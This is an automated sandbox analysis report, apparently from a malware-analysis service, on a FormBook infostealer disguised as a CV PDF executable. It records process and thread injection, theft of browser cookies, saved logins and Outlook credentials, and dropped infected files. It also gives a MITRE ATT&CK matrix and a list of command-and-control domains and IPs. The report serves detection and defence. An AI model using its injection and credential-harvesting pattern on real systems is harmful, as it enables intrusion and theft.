            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtQuerySystemInformation: Direct from: 0x77752DFC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtDelayExecution: Direct from: 0x77752DDC
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeNtAllocateVirtualMemory: Direct from: 0x77752BFC
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\mfpmp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: read write
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: unknown protection: read write
            Source: C:\Windows\SysWOW64\mfpmp.exeSection loaded: NULL target: unknown protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mfpmp.exeThread register set: target process: 8936
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\mfpmp.exeThread APC queued: target process: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exe
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: FD1008Jump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe"Jump to behavior
            Source: C:\Program Files (x86)\PHsZOyhkvmyMgxGRQbGJyoAgpElJFVCBrczssQOTLQGakVYlxbbKdoeVWDs\7EFPjTEjLAB4.exeProcess created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
            Source: CV_Sales Representative - Job Request PDF.exe, 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Acrobat.exe.1.drBinary or memory string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\*cef_*/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems Incorporated1.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.3.6.1.4.1.311.2.1.121.2.840.113549.1.9.61.3.6.1.4.1.311.3.3.1kernel32IsWow64ProcessSystem\CurrentControlSet\Control\CitrixProductVersionNumSoftware\Adobe\Acrobat\ExeSoftware\Microsoft\Windows\CurrentVersion\Policies\SystemEnableLUA/RegisterFileTypesOwnership /PRODUCT:Acrobat /VERSION:12.0 /FixPDF 3305580Click on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#32770/\Click on 'Change' to select default PDF handler#32770ADelRCP.exepropertiesClick on 'Change' to select default PDF handler.pdfShowAppPickerForPDF.exeProgram ManagerPROGMANApplicationClick on 'Change' to select default PDF handler.pdf Properties#32770Click on 'Change' to select default PDF handler Properties#3277012Click on 'Change' to select default PDF handler#32770Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice.0Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\UserChoice\InstallerSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdfSOFTWARE\Adobe\Acrobat Reader\12{A6EADE66-0000-0000-484E-7E8A45000000}{AC76BA86-0000-0000-7761-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-7760-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\{AC76BA86-0000-0000-BA7E-7E8A45000000}SOFTWARE\Adobe\Adobe Acrobat\VersionMajorVersionMinorVersionStringInstalledProductNameAdobe AcrobatreaderSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\.0SOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\PATHVersionMajorVersionMinor7760-BA7E-7AD7-VersionStringInstalledProductNameAdobe AcrobatreaderDCSOFTWARE\Wow6432Node\Adobe\Acrobat Reader\\InstallerSOFTWARE\Wow6432Node\Adobe\Adobe Acrobat\SOFTWARE\Adobe\Acrobat Reader\SOFTWARE\Adobe\Adobe Acrobat\ENU_GUIDPATHInstallLocationAcrobat.Document.DC.pdf{AC76BA86-0000-00
            Source: 7EFPjTEjLAB4.exe, 00000017.00000000.1274632765.0000000001970000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2438994124.0000000001971000.00000002.00000001.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2443146840.0000000001611000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST8412.tmp VolumeInformationJump to behavior
            Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST8432.tmp VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\perfhost.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\mfpmp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\mfpmp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_81
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_XP
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_XPe
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_VISTA
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_7
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: WIN_8
            Source: CV_Sales Representative - Job Request PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476283
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476747

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		2
            LSASS Driver            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		12
            System Time Discovery            		1
            Taint Shared Content            		1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt2
            Valid Accounts            		2
            LSASS Driver            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		3
            Obfuscated Files or Information            		NTDS126
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		14
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
            Valid Accounts            		1
            Software Packing            		LSA Secrets251
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
            Access Token Manipulation            		1
            Timestomp            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items412
            Process Injection            		1
            DLL Side-Loading            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job222
            Masquerading            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
            Valid Accounts            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron2
            Virtualization/Sandbox Evasion            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
            Access Token Manipulation            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638116 Sample: CV_Sales Representative - J... Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 52 www.stakemask.xyz 2->52 54 www.publicblockchain.xyz 2->54 56 85 other IPs or domains 2->56 74 Suricata IDS alerts for network traffic 2->74 76 Antivirus detection for dropped file 2->76 78 Antivirus / Scanner detection for submitted sample 2->78 82 6 other signatures 2->82 10 armsvc.exe 1 2->10         started        15 CV_Sales Representative - Job Request PDF.exe 3 2->15         started        17 elevation_service.exe 2->17         started        19 19 other processes 2->19 signatures3 80 Performs DNS queries to domains with low reputation 54->80 process4 dnsIp5 58 dlynankz.biz 85.214.228.140, 53984, 80 STRATOSTRATOAGDE Germany 10->58 60 gjogvvpsf.biz 208.117.43.225, 53948, 53958, 54015 STEADFASTUS United States 10->60 66 14 other IPs or domains 10->66 34 C:\Windows\System32\wbengine.exe, PE32+ 10->34 dropped 36 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 10->36 dropped 38 C:\Windows\System32\vds.exe, PE32+ 10->38 dropped 50 134 other malicious files 10->50 dropped 96 Drops executable to a common third party application directory 10->96 98 Infects executable files (exe, dll, sys, html) 10->98 62 acwjcqqv.biz 13.213.51.196, 49722, 49723, 49732 AMAZON-02US United States 15->62 64 ywffr.biz 52.11.240.239, 49720, 49721, 49724 AMAZON-02US United States 15->64 40 C:\Windows\System32\alg.exe, PE32+ 15->40 dropped 42 DiagnosticsHub.Sta...llector.Service.exe, PE32+ 15->42 dropped 44 C:\Windows\System32\AppVClient.exe, PE32+ 15->44 dropped 46 C:\Program Files (x86)\...\armsvc.exe, PE32 15->46 dropped 100 Binary is likely a compiled AutoIt script file 15->100 102 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->102 104 Writes to foreign memory regions 15->104 106 Maps a DLL or memory area into another process 15->106 21 svchost.exe 15->21         started        48 C:\Windows\System32\sppsvc.exe, PE32+ 17->48 dropped 108 Found direct / indirect Syscall (likely to bypass EDR) 17->108 110 Creates files inside the volume driver (system volume information) 19->110 file6 signatures7 process8 signatures9 84 Maps a DLL or memory area into another process 21->84 24 7EFPjTEjLAB4.exe 21->24 injected process10 signatures11 86 Found direct / indirect Syscall (likely to bypass EDR) 24->86 27 mfpmp.exe 24->27         started        process12 signatures13 88 Tries to steal Mail credentials (via file / registry access) 27->88 90 Tries to harvest and steal browser information (history, passwords, etc) 27->90 92 Modifies the context of a thread in another process (thread injection) 27->92 94 3 other signatures 27->94 30 7EFPjTEjLAB4.exe 27->30 injected process14 dnsIp15 68 leadmagnetkpis.shop 37.27.60.109, 54010, 54014, 54018 UNINETAZ Iran (ISLAMIC Republic Of) 30->68 70 www.dresses-executive.sbs 199.59.243.160, 53941, 53943, 53947 BODIS-NJUS United States 30->70 72 www.dappbtc.xyz 13.248.169.48, 53922, 53932, 53933 AMAZON-02US United States 30->72 112 Found direct / indirect Syscall (likely to bypass EDR) 30->112 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.